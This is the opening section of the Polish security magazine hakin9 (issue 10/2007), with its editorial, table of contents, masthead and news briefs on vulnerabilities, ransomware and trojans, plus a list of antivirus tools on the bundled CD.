Narzędzia. Początki. Atak. hakin9
|
|
- Izabela Piotrowska
- 8 lat temu
- Przeglądów:
Transkrypt
1
2
3
4 hakin9 Witam! Terminy haker, cracker kojarzą się zwykłym ludziom raczej z pojęciem cyberprzestępcy, jednak bardziej wtajemniczeni wiedzą, że te dwa typy różnią się od siebie. Jak zapewne Państwo wiedzą, hakerzy to osoby, które szukają luk w oprogramowaniu komputerowym, a później wykorzystują taką wiedzę, aby uzyskać dostęp do zabezpieczonych zasobów. Natomiast cracker to osoba zajmująca się łamaniem zabezpieczeń komputerowych. Hakerzy, skupieni w społeczności hakerskiej, używają terminu cracker dla odróżnienia się od przestępców; z kolei crackerzy terminu haker używają na określenie włamywaczy sieciowych. Obie wspomniane grupy ludzi działają z różnych pobudek. Jedni włamują się do serwisów komputerowych, aby wykryć luki, a potem szantażują właścicieli portali. A drudzy pracują teraz dla firm takich jak TrendMicro i pomagają im stworzyć szczepionki przeciwko nowym zagrożeniom, jakie stawia przed nami Sieć. Motywem działań hakerów i crackerów jest także chęć pozyskania rozgłosu i wywołania ogólnego chaosu. Istnieje swoisty podział hakerów pod względem etyki: black hat (hakerzy działający na pograniczu lub poza granicami prawa), white hat (hakerzy działający w imię prawa, nie chcący popełnić szkód), grey hat (grupa znajdująca się pomiędzy dwiema omawianymi wyżej kategoriami). My, jako Redakcja, mamy do czynienia ze wszystkimi omawianymi grupami hakerów, jednak cenimy tych z grupy white hat. Nasi Czytelnicy bardzo dobrze zdają sobie z tego sprawę. Mieliśmy wiele ciekawych artykułów poświęconych wykrywaniu luk w takich portalach, jak Allegro, Onet czy mbank. Umieszczaliśmy je w celu tylko i wyłącznie informacyjnym, aby uczulić omawiane serwisy na opisane zagrożenia. Mam nadzieję, że zamieszczane przez nas artykuły pomogły już niejednemu Czytelnikowi, dlatego chciałam gorąco polecić artykuł Bartosza Kalinowskiego Obroń swój komputer przed hakerem!!! Bartek w swoim tekście pokazuje przeróżne zachowania systemu świadczące o obecności hakera. Godnym przeczytania artykułem jest pozycja kilku autorów pt. Luki w Voip. W październikowym hakin9 przedstawiamy wywiad z bardzo interesującym człowiekiem, jakim jest komisarz Zbigniew Urbański. Z rozmowy nasi Czytelnicy dowiedzą się co nieco o samym bohaterze, a także o piractwie komputerowym widzianym okiem policjanta i organów ścigania. W numerze, który mają Państwo w rękach, jak zwykle nie zabraknie wielu ciekawych programów, na CD znajdują się m. in. G DATA Antivirus, F-Secure Internet Security oraz dwa nowe tutoriale. Życzę przyjemnej lektury! Katarzyna Juszczyńska W skrócie 6 Mateusz Stępień Przedstawiamy garść najciekawszych wiadomości ze świata bezpieczeństwa systemów informatycznych i nie tylko. Zawartość CD 10 Prezentujemy zawartość i sposób działania najnowszej wersji naszej sztandarowej dystrybucji hakin9.live Narzędzia Recenzja MindMap 5 Professional 12 Recenzja Directory Opus 9 13 Początki Ataki SQL Injection w praktyce 14 Dawid Gołuński Dawid w swoim artykule mówi na czym polegają ataki SQL Injection oraz jakie niosą zagrożenia. Pokaże krok po kroku techniki używane podczas ataku oraz metody obrony. Atak Luki w VoIP 26 Tomasz Piotrowski, Szczepan Wójcik, Mikołaj Wiśniewski, Wojciech Mazurczyk Autorzy przedstawią w jaki sposób zabezpieczyć systemy VoIP, na co zwracać uwagę przy kupowaniu i wdrażaniu tych systemów oraz jakie luki bezpieczeństwa znajdują się w systemie Asterisk. Atak hakera na Twój komputer 36 Bartosz Kalinowski Bartek w swoim artykule scharakteryzuje system, w którym można dostrzec obecność intruza i jakie zostawia po sobie ślady. Łamanie klucza rejestracji Windows XP 48 Rafał Podsiadły Rafał opisał w swoim artykule jak zaczyna życie najpopularniejszy system operacyjny. 4 hakin9 Nr 10/2007
5 Obrona Opera mechanizmy ochrony przed oszustwami 56 Marcin Kopeć Marcin w swoim tekście przedstawia w jaki sposób działa mechanizm ochrony przed oszustwami zaimplementowanymi w przeglądarce internetowej Opera. Konfiguracja serwera ISS dla ASP.NET z protokołem SSL 62 Sławomir Orłowski, Jacek Matulewski Sławek i Jacek przybliżą Czytelnikom temat konfiguracji serwera ISS do obsługi stron ASP.NET z uwierzytelnieniem SSL. Bezpieczna firma Audyt systemów informatycznych 68 Wojciech Malec Wojtek postara się wyjaśnić termin audytu informatycznego oraz przedstawi najważniejsze organizacje zawodowe właściwe dla audytu informatycznego. Księgozbiór 72 Recenzujemy książki: Kryptografia w Javie. Od podstaw oraz Apache. Zabezpieczenia aplikacji i serwerów WWW. Wywiad Wywiad z komisarzem Zbigniewem Urbańskim 74 Katarzyna Juszczyńska, Robert Gontarski Komisarz Zbigniew Urbański ekspert do spraw przestępczości komputerowej. Klub Techniczny Trend Micro dla MSP 77 Felieton Druga strona medalu 78 Patryk Krawaczyński Zapowiedzi 82 Zapowiedzi artykułów, które znajdą się w następnym wydaniu naszego pisma. jest wydawany przez Software Wydawnictwo Sp. z o.o. Dyrektor: Sylwia Pogroszewska Redaktor naczelna: Martyna Żaczek martyna.zaczek@software.com.pl Redaktorzy prowadzący: Katarzyna Juszczyńska katarzyna.juszczynska@software.com.pl Robert Gontarski robert.gontarski@software.com.pl Wyróżnieni betatesterzy: Przemysław Prytek, Paweł Lisowski Opracowanie CD: Rafał Kwaśny Kierownik produkcji: Marta Kurpiewska marta@software.com.pl Skład i łamanie: Artur Wieczorek arturw@software.com.pl Okładka: Agnieszka Marchocka Dział reklamy: adv@software.com.pl Prenumerata: Marzena Dmowska pren@software.com.pl Adres korespondencyjny: Software Wydawnictwo Sp. z o.o., ul. Bokserska 1, Warszawa, Polska Tel , Fax Osoby zainteresowane współpracą prosimy o kontakt: cooperation@software.com.pl Jeżeli jesteś zainteresowany zakupem licencji na wydawanie naszych pism prosimy o kontakt: Monika Nowicka monika.nowicka@software.com.pl tel.: +48 (22) fax: +48 (22) Druk: 101 Studio, Firma Tęgi Redakcja dokłada wszelkich starań, by publikowane w piśmie i na towarzyszących mu nośnikach informacje i programy były poprawne, jednakże nie bierze odpowiedzialności za efekty wykorzystania ich; nie gwarantuje także poprawnego działania programów shareware, freeware i public domain. Uszkodzone podczas wysyłki płyty wymienia redakcja. Wszystkie znaki firmowe zawarte w piśmie są własnością odpowiednich firm i zostały użyte wyłącznie w celach informacyjnych. Do tworzenia wykresów i diagramów wykorzystano program firmy Płytę CD dołączoną do magazynu przetestowano programem AntiVirenKit firmy G DATA Software Sp. z o.o. Redakcja używa systemu automatycznego składu UWAGA! Sprzedaż aktualnych lub archiwalnych numerów pisma w cenie innej niż wydrukowana na okładce bez zgody wydawcy jest działaniem na jego szkodę i skutkuje odpowiedzialnością sądową. hakin9 ukazuje się w następujących krajach: Hiszpanii, Argentynie, Portugalii, Francji, Belgii, Luksemburgu, Kanadzie, Maroko, Niemczech, Austrii, Szwajcarii, Polsce, Czechach, Słowacji. Prowadzimy również sprzedaż kioskową w innych krajach europejskich. Magazyn hakin9 wydawany jest w 7 wersjach językowych: PL ES CZ EN IT FR DE Nakład wersji polskiej egz. UWAGA! Techniki prezentowane w artykułach mogą być używane jedynie we własnych sieciach lokalnych. Redakcja nie ponosi odpowiedzialności za niewłaściwe użycie prezentowanych technik ani spowodowaną tym utratę danych. hakin9 Nr 2/2006 5
6 W skrócie Błąd w Xvid W popularnym zestawie kodeków wideo Xvid wykryto lukę, która umożliwia atakującemu całkowite przejęcie kontroli nad atakowanym komputerem. Gdy użytkownik komputera uruchomi odpowiednio spreparowany plik.avi dochodzi do ataku za pomocą aplikacji, która odwołuje się do programu Xvid. Błąd występuje w pliku mbcoding.c w funkcjach get_intra_ block, get_inter_block_h263 oraz get_inter_block_mpeg. Podatne są na niego zarówno aplikacje dla systemu Windows, jak i Linux. Xvid to kodek obrazu zgodny z ISO MPEG-4, wydany na licencji GNU GPL. Jego nazwa jest celowym anagramem nazwy kodeka DivX, który jest zamkniętą implementacją tego samego standardu. Haker odcina dostęp do kont owych na UK2.net... Domena internetowa UK2.net stała się celem ataku hakera, pozostawiając tym samym internautów czasowo odciętych od dostępu do i. Internauci pojawiający się na stronie 12 lipca ujrzeli przeobrażoną witrynę. Najwidoczniej była to sprawka islamskiego hakera. Wiele osób zwróciło się do nas w tej sprawie z informacjami, że nie są w stanie wejść na swoje konta mówią pracownicy portalu. Doświadczenia czytelnika Andy ego są typowe: UK2 była (dla mnie) nieosiągalna od godziny 6:00 tego ranka, gdy nie działał przez POP3. Próbowałem jeszcze raz o 12 w południe za pomocą POP3 i strony internetowej, ale bez rezultatu, oba nie działały jedyne co mogły mi zaoferować to zmienioną stronkę. Wcześniej też miałem dużo problemów z UK2. Moje konta były niestabilne przez 3 tygodnie pod koniec maja i na początku czerwca. Czasami działało, ale zazwyczaj odmawiało posłuszeństwa. Firma oficjalnie ogłosiła, że w godzinach porannych we czwartek stała się ofiarą ataku hakerskiego. Atak uniemożliwił internautom wejście na stronę UK2 i na skrzynkę ową. UK.net na swoich stronach napisał, że ta kwestia została już rozwiązana przez specjalistów. Pomimo tego, jak dodali, niektórzy użytkownicy mogli mieć problemy z dostępem do serwisu, dopóki DNS nie naniesie zmian. Kaspersky Anti-Virus na liście 100 najlepszych produktów IT 2007 Kaspersky Lab, producent rozwiązań służących do ochrony danych, informuje o otrzymaniu wyjątkowego wyróżnienia: program Kaspersky Anti-Virus 6.0 znalazł się na liście 100 najlepszych produktów IT 2007 opublikowanej przez PC World. Amerykański magazyn PC World kolejny raz już w okresie wakacyjnym opublikował listę 100 najlepszych, najnowocześniejszych oraz najbardziej docenionych przez konsumentów produktów z branży informatycznej i internetowej. Zestawienie obejmuje wiele różnorodnych produktów (sprzęt, oprogramowanie, serwisy oraz usługi internetowe). Na 55 miejscu listy, jako jedyny komercyjny program antywirusowy uwzględniony w zestawieniu, znalazł się Kaspersky Anti-Virus. Pełna lista dostępna jest pod adresem: ticle/ id, page,13 /ar ticle.html Kaspersky Anti-Virus to program Fake stron Apple antywirusowy firmy Kaspersky Lab, zapewniający ochronę przed zagrożeniami płynącymi z sieci Internet (wirusy, robaki, konie trojańskie, adware, spyware). Kaspersky Anti-Virus współpracuje z systemami Windows 98/Me/XP, NT Workstation oraz Windows 2000 Professional. Specjaliści z Sunbelt odkryli nowego trojana, który próbuje wyciągać pieniądze od użytkowników poprzez fikcyjną sprzedaż najnowszego dziecka koncernu Apple, iphone. Eksperci z Sunbelt twierdzą, że trojan mógł powstać na zamówienie przestępców, a w dodatku jest słabo wykrywalny przez aplikacje antywirusowe. Podczas odwiedzin google.com lub yahoo.com wirus pokazuje na ekranie okienka popup, które zawierają między innymi informację: supported by Google oraz supported by Yahoo. Kliknięcie w reklamę w zainfekowanym systemie kończy się przekierowaniem na specjalnie przygotowaną wersję strony, gdzie internauta może wypełnić formularz zamówienia i dokonać przelewu gdzieś do banku na Łotwie zamiast na konta Apple. iphone to urządzenie posiadające funkcje telefonu komórkowego, odtwarzacza MP3 (ipod) i komunikatora internetowego, jak nazwała tę funkcję Apple Inc. Nowatorskim rozwiązaniem w urządzeniu była rezygnacja z jakiejkolwiek klawiatury zamiast tego iphone posiada ekran dotykowy, przy którym użyto technologię o nazwie Multi-Touch: zamiast korzystać z rysika, wszystko wciska się jednym lub kilkoma palcami dłoni. iphone działa na zoptymalizowanej wersji Mac OS X. System zajmuje około 700 MB. Bateria w iphonie nie powinna być wymieniana przez użytkownika. Według producenta, czas pracy baterii to: do 24 godzin słuchania muzyki, do 8 godzin rozmowy, do 7 godzin oglądania filmów, do 6 godzin przeglądania Internetu, bądź do 250 godzin czuwania, jednak czas ten zależy od różnych ustawień. 6 hakin9 Nr 10/2007
7 Mateusz Stępień Początek ery petaflopsowych komputerów Elektroniczny gigant IBM zaprezentował najszybszy komputer świata Blue Gene/P. który jest sto tysięcy razy szybszy niż przeciętny komputer biurowy. Prędkość superkomputera to mniej więcej jeden petaflop (1 petaflop = 1,000 teraflopów = 1,000,000 gigaflopów), czyli tysiąc bilionów operacji na sekundę. Taką sprawność zapewnia rdzeni procesora IBM PowerPC 450, z których każdy jest taktowany zegarem o częstotliwości 850 MHz. Cztery rdzenie tworzą jeden procesor. System operacyjny superkomputera bazuje na Linuksie, a aplikacje można tworzyć w standardowych językach programowania, takich jak Fortran, C czy C++. Za pierwszy superkomputer uznaje się CDC Wirus szantażysta 6600, który powstał w 1963 roku według projektu i pod ścisłym nadzorem Seymoura Craya. Maszyna wykonywała 3 miliony operacji na sekundę. Był to pierwszy komputer, w którym zastosowano tranzystory krzemowe oraz nowatorską technikę chłodzenia podzespołów freonem. Najpotężniejszą maszyną w Polsce jest klaster HOLK. Komputer, znajdujący się w Centrum Informatycznym Trójmiejskiej Akademickiej Sieci Komputerowej, został zbudowany w 2003 roku i wówczas znajdował się na 231 pozycji TOP500. Maszyna zarządzana przez system GNU/Linux (dystrybucja Debian), której teoretyczna moc obliczeniowa sięga 1.5 TFLOPS, jest wykorzystywana do obliczeń naukowych. Specjaliści z Kaspersky Lab wykryli nową odmianę wirusa Gpcode, który szyfruje pliki na dyskach ofiar i żąda okupu w wysokości 300 dolarów za przywrócenie do nich dostępu. Robak Virus.Win32.Gpcode do szyfrowania plików wykorzystuje złożony algorytm informując że jest to RSA-4096, co nie jest prawdą, bo jak ustalili eksperci z Kaspersky Lab jest to algorytm RC4. Autorami wirusa najprawdopodobniej są Rosjanie. Na zaatakowanym komputerze wirus umieszcza również plik o nazwie read_me.txt, w którym umieszczona jest taka oto informacja: Hello, your files are encrypted with RSA-4096 algorithm ( en.wikipedia.org/wiki/rsa). You will need at least few years to decrypt these files without our software. All your private information for last 3 months were collected and sent to us. To decrypt your files you need to buy our software. The price is $300. To buy our software please contact us at: xxxxxxx@xxxxx.com and provide us your personal code -xxxxxxxxx. After successful purchase we will send your decrypting tool, and your private information will be deleted from our system. If you will not contact us until 07/15/2007 your private information will be shared and you will lost all your data. Glamorous team. Witaj, twoje pliki zostały zaszyfrowane przy użyciu algorytmu RSA-4096 ( wiki/rsa). Bez naszego oprogramowania odszyfrowanie tych plików zajmie ci przynajmniej kilka lat. Od trzech miesięcy twoje poufne informacje były gromadzone i wysyłane do nas. Aby odszyfrować swoje dane, musisz kupić nasze oprogramowanie. Jego cena to $300. W celu dokonania zakupu skontaktuj się z nami pod adresem xxxxxxx@xxxxx.com i załącz swój osobisty kod - xxxxxxxxx. Po dokonaniu zakupu, prześlemy ci narzędzie deszyfrujące a twoje poufne informacje zostaną skasowane z naszego systemu. Jeżeli nie skontaktujesz się z nami do 15 lipca 2007 twoje poufne informacje zostaną udostępnione w Internecie. Glamorous team. iphone częściowo złamany Jon Lech Johansen, czyli sławny DVD Jon, złamał część zabezpieczeń nowego iphone a. Ujawnił sposób aktywacji nowego telefonu firmy Apple bez potrzeby wiązania się umową z jedynym w Stanach Zjednoczonych autoryzowanym dostawcą AT&T. Jon napisał specjalny program, który imituje zachowanie serwera odpowiadającego za aktywację urządzeń przez firmę Apple. Kompletną instrukcję przeprowadzenia procesu aktywacji i kod źródłowy programu zastępującego serwer aktywujący telefony można znaleźć w blogu DVD Jona. Jon Lech Johansen jest norweskim programistą zaangażowanym w rozkodowywanie systemów zabezpieczeń. Jego ojciec jest Norwegiem, a matka Polką. Uczestniczył w stworzeniu programu deszyfrującego zakodowane filmy DVD DeCSS. Jon stworzył także zestaw otwartych sterowników do odtwarzacza MP3 Jaz- Piper (OpenJaz, 2001) i program QTFairUse do odczytywania zakodowanych strumieni AAC (2003). W 2004 r. dołączył do zespołu programistów VideoLAN, dla którego opracował wtyczkę do odtwarzania mediów zabezpieczonych systemem FairPlay oraz sposób odtwarzania materiałów zakodowanych w WMV9. Zdołał też ominąć zabezpieczenia protokołu AirPort Express firmy Apple i algorytmu ochrony plików NSC z Windows Media Playera. hakin9 Nr 10/2007 7
8 W skrócie IE7 podatny na spoofing Firma Secunia poinformowała o wykrytej przez Michała Zalewskiego luce w przeglądarce Microsoftu Internet Exlporer 7. Błąd występuje w metodzie document.open() i pozwala na sfałszowanie źródłowego adresu IP nawet w przypadku, gdy ręcznie wpiszemy adres nowej strony. (tzw. spoofing) Michał Zalewski, stwierdził: lukę można wykorzystać tylko wówczas, gdy jest uruchomiony JavaScript. Do tej pory Microsoft nie przygotował łatki na ten błąd, ewentualnego występowania luki nie sprawdzano w przeglądarce Internet Explorer 6. Internet Explorer w wersji Windows, rozwijany jest na bazie kodu Mosaic zakupionego od firmy Spyglass. Program został oficjalnie zaprezentowany 23 sierpnia 1995 roku. Najważniejsze nowości w wersji IE 7: przeglądanie stron w kartach, narzędzia wykorzystujące RSS i Atom, obsługa przezroczystych grafik PNG, ulepszona architektura, mająca lepiej chronić przed wirusami i robakami. Włamanie na brytyjski serwis firmy Microsoft Wykryto podatność na atak typu SQL Injection na brytyjskiej stronie Microsoftu. Dziura umożliwiała m. in. wyciągnięcie listy użytkowników i ich zakodowanych haseł, a także modyfikowanie tabel. Podatność na atak wykryto na stronie przeznaczonej dla partnerów. Haker z Arabii Saudyjskiej ukrywający się pod pseudonimem remoter umieścił w Internecie nagranie z włamania, które niestety jest już niedostępne. Po bardziej wnikliwej analizie wykazano, że serwis jest również podatny na atak typu Cross Site Scripting. Atak typu SQL Injection polega na takiej manipulacji aplikacją komunikującą się z bazą danych, aby ta umożliwiła atakującemu uzyskanie dostępu lub modyfikację danych, do których nie posiada on uprawnień. W praktyce polega to na wykorzystaniu interfejsu użytkownika (adresu URL, formularza HTML/XML, okna dialogowego itp.) do wprowadzenia do aplikacji spreparowanego ciągu znaków. Gadający koń trojański Sieci odkryto nowego niezwykle groźnego i złośliwego W konia trojańskiego o nazwie BotVoice.A. Szkodnik jest o tyle nietypowy, że po przeniknięciu do systemu niszczy dane znajdujące się na dysku twardym i informuje werbalnie użytkownika o szkodach, które spowodował (wykorzystując w tym celu wbudowany do Windows syntezator mowy): Zostałeś zarażony. Powtarzam, zostałeś zarażony, a twoje pliki systemowe zostały skasowane. Przykro mi. Miłego dnia i do widzenia. (You have been infected I repeat you have been infected and your system files have been deleted. Sorry. Have a nice day and bye bye). BotVoice.A potrafi m. in. zablokować dostęp do plików BAT, COM, EXE, MP3 oraz do Menedżera Zadań i Edytora Rejestru. Szkodliwy kod atakuje systemy Windows 95 i nowsze. Nie zagraża natomiast Windows Vista. Trojan nie potrafi samodzielnie zainfekować komputera, konieczna jest interakcja ze strony użytkownika. Rozprzestrzenia się głównie za pośrednictwem wymiennych nośników danych lub sieci komputerowych. BotVoice.A wykryty został przez specjalistów z firmy Panda Software. BotVoice.A został stworzony tylko po to, by niszczyć od lat nie widziałem tak doskonałego przykładu bezmyślnego wandalizmu komentuje Roger Thompson, specjalista z firmy Exploit Prevention Labs. Kolejnych 7 polskich studentów na praktykach w Redmond Microsoft poinformował, że siedmiu studentów z polskich uczelni technicznych będzie reprezentować nasz kraj podczas tegorocznej edycji praktyk, które co roku odbywają się w centrali firmy Microsoft Corporation w Redmond. Do tegorocznej edycji EMEA Internship Program polskie uczelnie zgłosiły 129 kandydatów, z których wybrano siedmiu uczestników. Jeden z nich weźmie udział w programie po raz drugi. Rozmowy z kandydatami po raz kolejny odbyły się w Warszawie. Jest to rezultat wysokiego poziomu reprezentowanego przez studentów pochodzących z Polski, a co za tym idzie, dużej liczby potencjalnych praktykantów. Praktyki prowadzone przez Microsoft w centrali w Redmond pozwalają studentom na udział w rzeczywistych projektach prowadzonych w korporacji, często kluczowych dla firmy oraz ważnych dla branży IT. Udział w programie to dla większości uczestników także pierwszy krok do zdobycia zatrudnienia w firmie Microsoft. Po zakończeniu stażu studenci mają rok na skończenie studiów oraz powrót do Redmond. Do tegorocznej edycji EMEA Internship Program zakwalifikowali się z Polski: Sylwia Kopczyńska, Piotr Kułaga, Łukasz Tomczyk, Paweł Baszuro, Piotr Findeisen, Mike Kaczmarczyk oraz Szymon Wasik z Politechniki Poznańskiej, Wyższej Szkoły Informatyki Stosowanej i Zarządzania w Warszawie, Politechniki Częstochowskiej, Wyższej Informatycznej Szkoły Zawodowej w Gorzowie Wielkopolskim oraz Uniwersytetu Warszawskiego. Udział w programie EMEA Internship Microsoftu jest dla mnie doskonałą okazją do zdobycia doświadczenia w międzynarodowej korporacji. Wyjazd ten pozwoli mi zobaczyć, jak wygląda praca w zespole zajmującym się dużymi projektami informatycznymi, a w przyszłości mam nadzieję ułatwi mi również zdobycie ciekawego i pełnego wyzwań zatrudnienia. Jestem przekonany, że pobyt w kampusie Microsoft w Redmond będzie jednocześnie okazją do dobrej zabawy i poznania ciekawych ludzi z całego świata powiedział Piotr Kułaga, student Wyższej Szkoły Informatyki Stosowanej i Zarządzania w Warszawie. 8 hakin9 Nr 10/2007
9 Mateusz Stępień Dziurawy Adobe Flash Player i Photoshop Atak na Pentagon Hakerzy przeprowadzili skuteczny atak na systemy komputerowe amerykańskiego ministerstwa obrony. Pentagon został zmuszony do wyłączenia części swojego systemu pocztowego, przez co prawie półtora tysiąca pracowników straciło dostęp do swoich kont owych. Zdecydowaliśmy się na wyłączenie części systemu pocztowego OSD w związku z wykryciem włamania do naszej infrastruktury. Nasi specjaliści wykonali wszelkie niezbędne działania dotyczące zabezpieczenia systemu oraz śladów włamania spodziewam się, że wszystkie systemy wrócą online już wkrótce mówił na konferencji prasowej Robert Gates, rzecznik prasowy Pentagonu. Przedstawiciele Departamentu Obrony nie Producent oprogramowania multimedialnego, firma Adobe Systems wydała poprawki dla swoich aplikacji: Flash Playera i Photoshopa (CS2/CS3). Poprawki te naprawiają usterki bezpieczeństwa, których potencjalny intruz może użyć do wykonania dowolnego kodu. W Adobe Flash Player wykryto luki, które m. in. umożliwiają napastnikowi zdalne przejęcie pełnej kontroli nad systemem. Podatności występują w aplikacjach: Adobe Flash Player w wersji i wcześniejszych, Adobe Flash Player w wersji i wcześniejszych, Adobe Flash Player w wersji i wcześniejszych. Zaktualizowana wersja Flash Playera jest dostępna (podobnie jak łatki dla wcześniejszych wydań odtwarzacza) pod adresem: W oprogramowaniu Photoshop CS2 i CS3 wykryto błąd, który pozwala na wstrzyknięcie i uruchomienie dowolnego kodu. Istotą tego błędu jest niepoprawne przetwarzanie plików zapisanych w formatach PNG, DIB, RLE i BMP. Błąd w Photoshopie wykrył specjalista ukrywający się pod pseudonimem Marsu. Adobe Systems to amerykańska firma z siedzibą w San José w Kalifornii, znana z projektowania szeroko rozumianego oprogramowania graficznego dla systemów Mac OS i Windows. Przedsiębiorstwo założyli w 1982 r. byli pracownicy Xerox PARC, John Warnock i Charles Geschke. Najważniejsze produkty firmy to: Adobe Acrobat, Adobe After Effects, Adobe Illustrator, Adobe InDesign, Adobe Photoshop, Adobe Premiere, Adobe Reader. ujawnili żadnych innych informacji na temat włamania potwierdzili jedynie: Atak ten nie miał właściwie żadnego wpływu na nasze działania napastnik nie uzyskał dostępu do żadnych tajnych informacji. Nasza infrastruktura informatyczna jest wciąż atakowana, mamy więc doświadczenie w postępowaniu w takich sytuacjach. Ruszyła internetowa aukcja exploitów Jedna z firm szwajcarskich uruchomiła stronę aukcyjną, na której wystawiane na sprzedaż będą informacje o nowych lukach w oprogramowaniu. Witryna nosi nazwę WabiSabiLabi i jej głównym celem jest nakłonienie specjalistów, którzy znaleźli luki, by sprzedawali je firmom zainteresowanym w ich załataniu, a nie cyberprzestępcom. Zdecydowaliśmy się na uruchomienie serwisu umożliwiającego sprzedawanie wyników badań nad bezpieczeństwem, ponieważ wielu specjalistów odkrywa luki, ale niewielu z nich informuje o tym odpowiednich ludzi. Naszym celem jest umożliwienie im uzyskania uczciwej ceny za pracę i jednoczesne zapewnienie, że nie będą musieli oddawać jej wyników za darmo ani sprzedawać cyberprzestępcom mówi Herman Zampariolo, szef firmy. Pomysł szwajcarskiej firmy ma zarówno zwolenników, jak i przeciwników. Do krytykantów należy Gunter Ollman, dyrektor IBM Internet Security Systems: To przypomina witryny, które istnieją na czarnym rynku. Będziemy mieli do czynienia z tymi samymi ludźmi, którzy szukają dziur, by je sprzedać. To dla nich po prostu dodatkowy kanał dystrybucji. Korzystanie z serwisu będzie darmowe przez sześć miesięcy, potem będą pobierane opłaty w wysokości 10% kwoty sprzedaży. Nowa odmiana virusa Gpcode W Sieci pojawiła się nowa odmiana wirusa Gpcode, która to po zarażeniu komputera użytkownika szyfruje pliki na dyskach. Wirus za odszyfrowanie domaga się zapłaty 300 dolarów i informuje, że używa algorytmu szyfrującego RSA-4096, co nie jest prawdą. Na dysku pojawia się także plik tekstowy read_me.txt w którym możemy przeczytać Hello, your files are encrypted with RSA-4096 algorithm ( You will need at least few years to decrypt these files without our software. All your private information for last 3 months were collected and sent to us. To decrypt your files you need to buy our software. The price is $300 (...) Specjaliści z firmy Kaspersky po analizach doszli do tego, że wykorzystywany jest tu algorytm RC4. Najnowsze oprogramowanie firmy Kaspersky już radzi sobie z wirusem i odszyfrowuje pliki. Najprawdopodobniej autorami wirusa są Rosjanie. hakin9 Nr 10/2007 9
10 hakin9.live Zawartość CD Na dołączonej do pisma płycie znajduje się hakin9.live (h9l) w wersji on BackTrack2.0, zawierająca przydatne narzędzia, dokumentację, tutoriale i materiały dodatkowe do artykłów. Aby zacząć pracę z hakin9.live, wystarczy uruchomić komputer z CD. Po uruchomieniu systemu możemy zalogować sie jako użytkownik hakin9 bez podawania hasła. Materiały dodatkowe Tutorial podstawy języka Python, Tutorial wstęp do free Pascal. Programy: G DATA AntiVirus 2007, F-secure Internet Security 2007, AVG Anty-Rootkit, AVG Antywirus 7.5, CureIT. G DATA AntiVirus 2007 Aktywacja od 5 października. G DATA AntiVirus 2007 umacnia wiodącą pozycję w czołówce programów antywirusowych w dziedzinie wykrywalności wirusów. Dzięki zoptymalizowanej technologii podwójnego skanowania połączonej z mechanizmem OutbreakShield, nowy antywirus wykrywa wirusy jeszcze dokładniej i szybciej, zużywając jednocześnie znacznie mniej zasobów systemowych. G DATA AntiVirus 2007 usuwa złośliwe oprogramowanie typu spyware, adware, riskware, a także wirusy, trojany, robaki. Gwarantuje jeszcze skuteczniejszą ochronę przed hakerami. Program przeznaczony dla użytkowników wymagających, potrzebujących prostej i szybkiej ochrony komputera. Dzięki zastosowaniu dwóch silników skanujących oraz trzech skanerów poczty Twoje dane są w 100% bezpieczne. To jednak początek długiej listy zalet, docenianych przez specjalistów na całym świecie. F-secure Internet Security 2007 Zestaw zabezpieczeń przeznaczony dla użytkowników domowych i małych firm. W skład pakietu wchodzą następujące moduły, takie jak: ochrona antywirusowa, antispyware, firewall, ochrona poczty, antispam, ochrona przed intruzami IDS oraz moduły kontroli rodzicielskiej i kontroli aplikacji. Narzędzie chroni system poza standardowymi wirusami i robakami także przed oprogramowaniem szpiegującym i rootkitami, co zapewnia pełną ochronę komputera. W wersji 2007 Internet Security posiada swoiste laboratorium wykrywania wirusów, wykorzystując technologię DeepGuard. AVG Anti-Rootkit AVG Anti-Rootkit jest silnym narzędziem z technologią state-of-art do wykrywania i usuwania rootkit'ów. Rootkit'y służą do ukrywania złośliwych objektów na komputerze takich jak trojany czy keyloggery. Jeżeli włamywacz wykorzystuje technologię rootkit do tego, aby ukryć swoją obecność, wtedy bardzo ciężko jest znaleźć złośliwe oprogramowanie na komputerze. AVG Anti-Rootkit daje Ci możliwość znalezienia i usunięcia rootkita oraz zdemaskowania złodzieja, którego ukrywa rootkit. Interface jest przejrzysty i łatwy w obsłudze. Oprogramowanie zapewnia szybkie i efektywne wykrywanie nawet obiektów NTFS-ADS AVG Antywirus 7.5 Najnowsze wydanie narzędzia przeciwko wirusom firmy Grisoft do użytku domowego na pojedyńczym komputerze. Zapewnia najwyższy poziom wykrywalności dlatego miliony użytkowników na świecie powierzyło bezpieczeństwo swoich komputerów właśnie temu produktowi. Poruszanie się po oprogramowaniu jest intuicyjne i proste, samo narzędzie nie potrzebuje dużych zasobów komputera i nie zwalnia jego pracy. AVG Anti-Virus umożliwia przeprowadzanie automatycznych aktualizacji, oraz zapewnia ochrone w czasie rzeczywistym poprzez nadzorowanie dzialających programów czy otwieranych plików. CureIT Jest to darmowy anti-virus i anti-spyware bazujący na silniku skanera Dr.Web Anti-virus, który pomoże Ci szybko przeskanować i wyleczyć komputer jeśli będzie to konieczne. Obsługuje stacje robocze wykorzystujące takie systemy operacyjne jak MS Windows 95OSR2/ 98/Me/ NT 4.0/2000/XP/2003Vista. Interface skanera jest przystosowywany odpowiednio do wykrytego języka na danym komputerze, jeżeli lokalny język nie zostanie wykryty domyślnie ustawiany jest angielski. Narzędzie zawiera aktualną bazę antywirusów na czas pobrania, a aktualizacje są przeprowadzane, aż dwa razy na godzinę. Aby korzystać z najświeższej bazy wirusów należy ściągnąć ostatnia wersję Dr. Web CureIt, ponieważ narzędzie nie zawiera bezpośredniej aktualizacji. Serdeczne podziękowania dla firmy TTS Company za udostępnienie programu EagleEyeOS Professional Severe w numerze hakin9 8/ hakin9 Nr 10/2007
11 Jeśli nie możesz odczytać zawartości płyty CD, a nie jest ona uszkodzona mechanicznie, sprawdź ją na co najmniej dwóch napędach CD. W razie problemów z płytą, proszę napisać pod adres: cd@software.com.pl
